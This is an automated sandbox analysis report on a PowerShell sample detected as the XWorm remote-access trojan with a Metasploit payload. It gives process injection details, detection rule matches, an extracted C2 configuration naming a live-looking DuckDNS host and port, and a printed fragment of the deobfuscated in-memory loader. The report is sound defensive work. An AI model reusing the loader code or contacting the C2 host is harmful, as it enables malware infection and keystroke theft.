Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xy.ps1

Overview

General Information

Sample name:xy.ps1
Analysis ID:1429329
MD5:c003b6342b7828dcb9d436a403899d68
SHA1:25d2b57463626a791442321017592d46d93c2a6c
SHA256:7b81e1999036d174f355f3eb4d4bdb93fdd3a67c28f738dc6f14de84fff20880
Tags:ps1
Infos:

Detection

Metasploit, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 2340 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["kdke.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x79a2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7a3f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7b54:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7650:$cnc4: POST / HTTP/1.1
    00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xa4af:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0xcf17:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
    • 0xac06:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
    00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.notepad.exe.1d8a4a10000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
        6.2.notepad.exe.1d8a4a10000.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x79a2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7a3f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7b54:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7650:$cnc4: POST / HTTP/1.1
        6.2.notepad.exe.1d8a4a10000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          6.2.notepad.exe.1d8a4a10000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x5ba2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x5c3f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5d54:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x5850:$cnc4: POST / HTTP/1.1
          6.2.notepad.exe.1d8a4d1ce28.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3488.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", ProcessId: 3488, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1", ProcessId: 3488, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["kdke.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Sample uses string decryption to hide its real strings
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: kdke.duckdns.org
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: 8896
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: <123456789>
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: <Xwormmm>
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: XWorm V5.6
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpackString decryptor: USB.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: kdke.duckdns.org
              Source: xy.ps1String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\notepad.exeCode function: 6_2_000001D8A2F5B9236_2_000001D8A2F5B923
              Source: C:\Windows\System32\notepad.exeCode function: 6_2_000001D8A2F5B5036_2_000001D8A2F5B503
              Source: C:\Windows\System32\notepad.exeCode function: 6_2_000001D8A2F5BD5B6_2_000001D8A2F5BD5B
              Source: C:\Windows\System32\notepad.exeCode function: 6_2_000001D8A2F5A8DB6_2_000001D8A2F5A8DB
              Source: C:\Windows\System32\notepad.exeCode function: 6_2_000001D8A2F5C1E36_2_000001D8A2F5C1E3
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\notepad.exeMutant created: NULL
              Source: C:\Windows\System32\notepad.exeMutant created: \Sessions\1\BaseNamedObjects\QEL4wgqwsRH2WthB
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4n4y52un.zpo.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('hTofNzZhzulVsFFp+HACplQ9P3ahPBbqw4tkMHSW0m9hYiqrCffLlSJiSDphhyFsTErdQVNi913EVNZvNToD6hL7Drhmt+gm1ZlP4JhK7I13mzQroJyUCK0O4xTM29A+Tkgbr5NiExtYUEcNgI0B/rcApStdz462bPK7Zn65RW7Bv0k1nik9X8g/253l3fRWd9PL/xSBduh9rzbmtVKiX0byordYHsxWXGXMHlNqRpcaxZaPytxbBilAX+JKtnZQxJ2HY7lYNERX2xupr/bLOfXIWFtIE/TyDfyIrg4jv+c4VcASbcBuP7CJbAnJrSho3KiPL8KEqM/f9pZsCuE0nYxIOlJqgbe7Q9cL0TAqnKYMuhSYjdYj6smYSyLq5kDMu6bI2HKhYeQ8rLQ62PlJDyyStpMFbcagK7wfW2RMHaonb2WM1i3QOrsnGJ2VqaOdBOeQF4KFpvQwBQ8EYHdYc83zlSINpQKgRytlRrUGKTR3QtB6iJGx0NKUjMWNRxxCqVv4R9nvKamd94VSnrtOeGQbkgMUYp3Q9vvu8mW4keSma7e1+HXQgMhFFW4hJ97UZHqiAeeLlKSHrIs72XPvvU6inbmrCxopCXqLo7H5oT7KIUTU32P0IZlpdYs7A0o6VUE6abBfeu5c4THv4hcXiPEwSTCf9w3PTYZ5dC/UoGeg+1GSNdxyDti4W4Eox1q5baY1pe/p3yhU+Fv+wCcUpi+Vpk7eLqW1v
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: xy.ps1Static file information: File size 13631488 > 1048576

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
